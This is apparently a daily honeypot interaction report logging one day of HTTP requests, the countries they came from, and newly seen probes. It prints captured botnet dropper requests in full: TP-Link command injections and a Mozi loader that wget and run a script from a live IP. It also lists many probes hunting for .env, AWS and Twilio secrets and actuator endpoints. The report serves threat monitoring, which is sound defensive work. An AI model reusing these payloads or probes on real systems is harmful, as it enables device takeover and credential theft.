Report: 2025-04-30

Author: Shoggoth Industries

Daily Report: 2025-04-30

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 81 new requests that have never been observed before (these were added to the monitored request database).

A total of 1752 requests were recorded during the day, originating from 3 different countries, with a peak of 388 requests coming from NL.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| FR | Singapore |
| US | Singapore |
| CN | Dubai |
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 45.95.147.209 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1` |
| 124.131.139.150 | `27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0` |
| 141.98.11.128 | `GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1` |

request

The requests listed here are those that have not yet been integrated into the request database.

| | number_of_occurence | request |
|---|---|---|
| 7 | 14 | `\x04\x01\x01\xBB\x8E,\xD7\xA1\x00` |
| 8 | 11 | `\x05\x01\x02` |
| 9 | 10 | `CONNECT myip.wtf:443 HTTP/1.1` |
| 17 | 6 | `GET /api/v1/ws/server HTTP/1.1` |
| 91 | 4 | `GET http://ipv4.icanhazip.com/ HTTP/1.1` |
| 168 | 2 | `GET /.env.env HTTP/1.1` |
| 170 | 2 | `GET /env.xml HTTP/1.1` |
| 171 | 2 | `GET /.env.xml HTTP/1.1` |
| 185 | 2 | `GET /Awsconfig.json HTTP/1.1` |
| 191 | 2 | `GET /?format=json HTTP/1.1` |
| 194 | 2 | `GET /PHPInfo.php HTTP/1.1` |
| 195 | 2 | `GET /PhpInfo.php HTTP/1.1` |
| 196 | 2 | `GET /01-info.php HTTP/1.1` |
| 197 | 2 | `GET /info_php.php HTTP/1.1` |
| 198 | 2 | `GET /0info.php HTTP/1.1` |
| 199 | 2 | `GET /0-info.php HTTP/1.1` |
| 200 | 2 | `GET /0_info.php HTTP/1.1` |
| 205 | 2 | `GET /user_secrets.yml HTTP/1.1` |
| 206 | 2 | `GET /app/env/.env HTTP/1.1` |
| 207 | 2 | `GET /.env.html HTTP/1.1` |
| 208 | 2 | `GET /.env.list HTTP/1.1` |
| 213 | 1 | `GET /%61%70%69/%65%6e%37%36 HTTP/1.1` |
| 217 | 1 | `GET /%65%6e%76 HTTP/1.1` |
| 247 | 1 | `GET /EcnG HTTP/1.1` |
| 248 | 1 | `GET /PSCv HTTP/1.1` |
| 251 | 1 | `GET /%67%61%74%65%77%61%79/%65%6e%76 HTTP/1.1` |
| 253 | 1 | `GET /q1Ri HTTP/1.1` |
| 257 | 1 | `GET /%6d%61%6e%61%67%65%6d%65%6e%74/%65%6e%76 HTTP/1.1` |
| 258 | 1 | `GET /%6d%61%6e%61%67%65%6d%65%6e%74/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 259 | 1 | `GET /%6d%61%6e%61%67%65/%65%6e%76 HTTP/1.1` |
| 260 | 1 | `GET /%6d%61%6e%61%67%65/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 261 | 1 | `GET /%67%61%74%65%77%61%79/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 262 | 1 | `GET /%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 263 | 1 | `GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%37%36 HTTP/1.1` |
| 265 | 1 | `GET /Kz4c HTTP/1.1` |
| 272 | 1 | `\x04\x01\x01\xBB@\xE9\xA3j\x00` |
| 273 | 1 | `GET /temp.env HTTP/1.1` |
| 274 | 1 | `GET /tmp.env HTTP/1.1` |
| 277 | 1 | `GET /security.txt HTTP/1.1` |
| 278 | 1 | `GET /security.yml HTTP/1.1` |
| 279 | 1 | `GET /settings.yml HTTP/1.1` |
| 282 | 1 | `GET /test.env HTTP/1.1` |
| 285 | 1 | `GET /twilio.xml HTTP/1.1` |
| 286 | 1 | `GET /twilio HTTP/1.1` |
| 287 | 1 | `GET /.twilio HTTP/1.1` |
| 288 | 1 | `GET /.twilio.env HTTP/1.1` |
| 289 | 1 | `GET /twilio.txt HTTP/1.1` |
| 293 | 1 | `GET /twilio.yml HTTP/1.1` |
| 294 | 1 | `GET /twilio.php HTTP/1.1` |
| 295 | 1 | `GET /twilio.js HTTP/1.1` |
| 296 | 1 | `GET /twilio.json HTTP/1.1` |
| 302 | 1 | `GET /._env HTTP/1.1` |
| 303 | 1 | `GET /_.env HTTP/1.1` |
| 304 | 1 | `GET /config/frontend_dev.php HTTP/1.1` |
| 306 | 1 | `GET /robots.txt/ HTTP/1.1` |
| 308 | 1 | `GET /api;/actuator;/en%76; HTTP/1.1` |
| 309 | 1 | `GET /57.129;/env; HTTP/1.1` |
| 310 | 1 | `GET /57.129;/actuator;/env; HTTP/1.1` |
| 311 | 1 | `GET /en%76; HTTP/1.1` |
| 312 | 1 | `GET /actuator;/en%76; HTTP/1.1` |
| 313 | 1 | `GET /api;/en%76; HTTP/1.1` |
| 322 | 1 | `GET /admin/config.php HTTP/1.0` |
| 327 | 1 | `GET /%61%70%69/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 328 | 1 | `GET /%61%70%69/%69%6e%74%65%72%6e%61%6c/%61%63%74%75%61%74%6f%72/%65%6e%76 HTTP/1.1` |
| 329 | 1 | `GET /%61%70%69/%65%6e%76 HTTP/1.1` |
| 330 | 1 | `GET /61;/env; HTTP/1.1` |
| 331 | 1 | `GET /61;/actuator;/env; HTTP/1.1` |
| 332 | 1 | `GET /manage;/actuator;/env; HTTP/1.1` |
| 333 | 1 | `GET /manage;/env; HTTP/1.1` |
| 334 | 1 | `GET /management;/actuator;/env; HTTP/1.1` |
| 335 | 1 | `GET /management;/env; HTTP/1.1` |
| 336 | 1 | `GET /management/env HTTP/1.1` |
| 355 | 1 | `\x00\x04\x08*\x10\x00` |
| 356 | 1 | `\x00\x0E\x08\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00` |
| 357 | 1 | `\x00\x0E8\xA3\xEF\xCD\xC5EK:\xC4\x00\x00\x00\x00\x00` |
| 379 | 1 | `GET /actuator;/env; HTTP/1.1` |
| 385 | 1 | `GET /api;/internal;/actuator;/env; HTTP/1.1` |
| 386 | 1 | `GET /api;/env; HTTP/1.1` |
| 389 | 1 | `GET /api;/actuator;/env; HTTP/1.1` |
| 391 | 1 | `GET /gateway;/env; HTTP/1.1` |
| 392 | 1 | `GET /gateway;/actuator;/env; HTTP/1.1` |

country_iso_code

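| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 388 | NL |
| 1 | 330 | US |
| 2 | 283 | GB |
| 3 | 184 | SC |
| 4 | 100 | CN |
| 5 | 68 | HK |
| 6 | 51 | IN |
| 7 | 45 | IS |
| 8 | 41 | PL |
| 9 | 39 | SG |
| 10 | 37 | DE |
| 11 | 30 | FR |
| 12 | 14 | AO |
| 13 | 14 | UA |
| 14 | 14 | CA |
| 15 | 13 | PT |
| 16 | 12 | KR |
| 17 | 10 | HR |
| 18 | 8 | TH |
| 19 | 6 | JP |
| 20 | 6 | FI |
| 21 | 6 | KW |
| 22 | 6 | LA |
| 23 | 6 | TR |
| 24 | 5 | GH |
| 25 | 5 | BE |
| 26 | 4 | VE |
| 27 | 4 | IT |
| 28 | 4 | RU |
| 29 | 4 | VN |
| 30 | 3 | BR |
| 31 | 2 | AL |
| 32 | 2 | ES |
| 33 | 2 | MC |
| 34 | 2 | SA |
| 35 | 1 | CO |
| 36 | 1 | BG |
| 37 | 1 | LT |
| 38 | 1 | ID |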
